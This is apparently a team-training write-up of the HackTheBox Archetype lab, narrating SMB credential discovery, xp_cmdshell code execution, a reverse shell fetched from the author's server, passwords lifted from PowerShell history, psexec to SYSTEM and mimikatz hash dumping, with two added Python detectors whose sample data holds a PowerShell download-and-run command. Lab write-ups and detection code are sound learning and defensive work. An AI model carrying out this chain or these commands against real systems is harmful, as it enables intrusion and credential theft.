Starting Point — Archetype
In an effort to build the capability within my organization to produce more secure, reviewed, and actively tested deliveries, I am putting these reviews together so the team can grow and learn together. Since we formed the team, we have been leveraging HackTheBox as an environment where we can learn and share. The best spot to start is “Starting Point”, so here we go. This documents not only the box, but the process I went through to get to the end.
So after firing up the box and turning on the VPN for access, I began with a basic nmap. To make my life easier, because I NEVER remember IP addresses, I start in a bash prompt and store the IP in a variable so I don’t have to retype it for each command. My process is to run nmap on all ports for discovery, then re-run nmap on the ports that were found with the -sC and -sV options, storing the output in a file with -oN. In this case, we found RPC, NetBIOS, SMB, and MSSQL ports open.
Now it is all about where you want to start, so I started with the low-hanging fruit, which is usually SMB. I begin by checking the default shares with smbmap -H $IP, but that returned nothing. The next check in my process is to attempt an anonymous login to see if we can see anything. Since we are on the command line, I have to escape the backslashes with backslashes.
Since smbmap didn’t find anything, I tried crackmapexec to see if it would take anonymous and show details.
Since neither of these told me the permission sets of the shares, I’ll just check each one individually with smbclient. The only one that allowed me to connect without authentication was backups, and it contained a single file. I downloaded that file for inspection.
This file had a set of credentials in it for a user called ARCHETYPE\sql_svc. I’ll add this to a file called “creds” in the format “username:password” for future use. To validate this credential, it’s back to crackmapexec. That was a win!
If I go back to smbmap with the credentials, I can now see the permissions. As you can see below, we don’t get much more with these creds.
With nothing here, and given the name sql_svc, I’ll pause further recon and move on to the MSSQL port. Since I’m using a Linux distro, I’ll leverage the mssqlclient.py tool from Impacket. To start, I’ll try the initial attempt.
It says we got an encryption error. Looking at the help for the command, there is another flag to switch that, so let’s try it.
Got a little further, but now there is a new problem with integrated authentication. How to fix this? Don’t pull the password from a file; type it in.
Okay, now we have an SQL prompt, and the recon continues. I prefer to reference this page: Information Gathering | NetSPI SQL Injection Wiki, but I also have a list of notes I can check if I don’t have automation. After some checking, it appears that we are a db admin! With that, it’s time to find a way to escalate. I prefer to start here: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server, and I began with “xp_cmdshell”.
So now we have RCE on the box as sql_svc. Great! Looking at the permissions, SeImpersonatePrivilege is enabled, so there may be an opening for JuicyPotato later; let’s keep that in mind. The easiest thing for me to do is to download a reverse shell and have it call back to me so I can get a fully interactive shell. I started with the nishang shell in /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 and modified it with the IP and port I wanted to use. I started my python server in the upper left, turned on my listener in the lower left, then told xp_cmdshell to download the script and pass it to powershell to run.
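From the defender’s side, the step above (xp_cmdshell spawning a shell that pulls a script from a remote host) is a textbook detection: sqlservr.exe should almost never be the parent of cmd.exe or powershell.exe. The Python below is an added example, not from the original post; it runs that rule over constructed Sysmon Event ID 1 style process-creation records (the field names Image, ParentImage and CommandLine follow Sysmon; the paths, host name and command lines are made up for this example).

```python
import re

# Constructed Sysmon Event ID 1 (process creation) style records, one per line,
# as "key=value|key=value". Field names follow Sysmon; the values are made up.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\svchost.exe|ParentImage=C:\\Windows\\System32\\services.exe|CommandLine=svchost.exe -k netsvcs",
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe|CommandLine=cmd.exe /c whoami /priv",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe|CommandLine=powershell -c IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE-HOST/s.ps1')",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=powershell -c Get-Date",
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Common "fetch a script and run it" idioms found in the child's command line.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|certutil", re.I)


def parse_event(line):
    """Turn 'k=v|k=v' into a dict, splitting each field on the first '=' only."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Severity for any process whose parent is sqlservr.exe, else None."""
    if basename(event.get("ParentImage", "")) != "sqlservr.exe":
        return None
    child = basename(event.get("Image", ""))
    if child not in SHELLS:
        return "medium"    # SQL Server rarely spawns anything; worth a look
    if DOWNLOAD_CRADLE.search(event.get("CommandLine", "")):
        return "critical"  # shell from SQL Server plus a download cradle
    return "high"          # xp_cmdshell-style shell execution


def scan(lines):
    """Return (severity, command line) for every alert-worthy record."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for severity, cmd in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {cmd}")
```

Disabling xp_cmdshell where it is not needed and alerting on any child process of sqlservr.exe removes this whole step from an attacker’s path.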
Now I have a shell and can start enumerating the box directly instead of through the SQL prompt. Instead of manual enumeration, I’ll use the PEAS suite from GitHub and let it enumerate across the system.
So I’m able to download the file, but it gets deleted immediately after it is saved. I need to move to a directory that allows me to save, and Temp isn’t it. The Music folder in the user’s home directory works. However, it still gives me a problem executing it. Looking at my execution policy, it shows “RemoteSigned”, which is going to lead to a few more problems. So, I’m going to do some initial recon to see what we have for this user. Using gci -Hidden to see what is in the home directory, there are a few hidden files. Knowing that most of a user’s application data is in AppData, let’s look through there for files. That gave a lot of desktop.ini files, so let’s exclude those:
gci -Force -Recurse -Exclude "desktop.ini" | where {! $_.PSIsContainer}
Now we can scroll through what it found and see if anything is interesting. There are a few that need investigation, but one is almost always a must: command history!
And here we have a case where we caught the admin typing his password on the command line. I’ll add that to the creds file I have been building so we can track it. I attempt to launch straight from where I am.
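A defender can sweep for this exposure before anyone else finds it: PSReadLine writes every interactive PowerShell command to ConsoleHost_history.txt under %APPDATA%, so a password passed as an argument (net use ... /user:..., -Password '...') lands there in clear text. The Python below is an added example, not from the original post; it runs a few credential-on-the-command-line patterns over a constructed history file (host name and passwords are placeholders), reports masked findings, and scan_profile() reads a real profile’s history file if one is present.

```python
import re
from pathlib import Path

# Constructed PSReadLine history (the format of ConsoleHost_history.txt:
# one command per line). Host name and passwords are placeholders.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users
net use T: \\\\EXAMPLE-HOST\\backups /user:administrator P@ssw0rd-PLACEHOLDER
Invoke-Sqlcmd -ServerInstance . -Query "select @@version" -Username sa -Password 'sa-PLACEHOLDER'
$secure = Read-Host -AsSecureString
runas /user:CORP\\admin cmd.exe
"""

# Relative path of the PSReadLine history file inside a user profile.
HISTORY_REL = Path("AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt")

# Ways a secret ends up as a literal argument; group 1 captures the secret.
PATTERNS = {
    "net use /user: password": re.compile(r"\bnet(?:\.exe)?\s+use\s+.*?/user:\S+\s+(\S+)", re.I),
    "-Password literal": re.compile(r"-Password\s+['\"]?([^'\"\s]+)", re.I),
    "ConvertTo-SecureString literal": re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]", re.I),
}


def mask(secret):
    """Keep two characters so the owner can recognise it; never print it whole."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_history(text):
    """Return (line number, pattern name, masked secret) for each hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append((lineno, name, mask(match.group(1))))
    return findings


def scan_profile(profile_dir):
    """Scan the history file of one user profile; empty list if none exists."""
    history = Path(profile_dir) / HISTORY_REL
    if not history.is_file():
        return []
    return scan_history(history.read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    for lineno, name, masked in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {name}: {masked}")
```

Note that the runas line is not flagged: it prompts for the password instead of taking it as an argument, which is the habit this check is meant to encourage.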
However, it doesn’t work. I forgot I don’t have a tty; I just have this reverse shell that isn’t letting me use a full shell. So, let me go back to my unix box and try these creds. I’ll leverage crackmapexec to see if they actually work:
Nice, that “Pwn3d!” word is good to see. So, let’s try to log in as the administrator. I’ll use psexec since we have a C$ share available.
And now we have a shell on the box as SYSTEM. With this we can look around, plant a backdoor, and see if there are more creds we can extract. Checking the history file for this user, we got nothing. So let’s use mimikatz to extract what we can. I was able to pull the hashes for the system. You can pillage all you want, you are SYSTEM!
That’s enough for this box. Round two next week!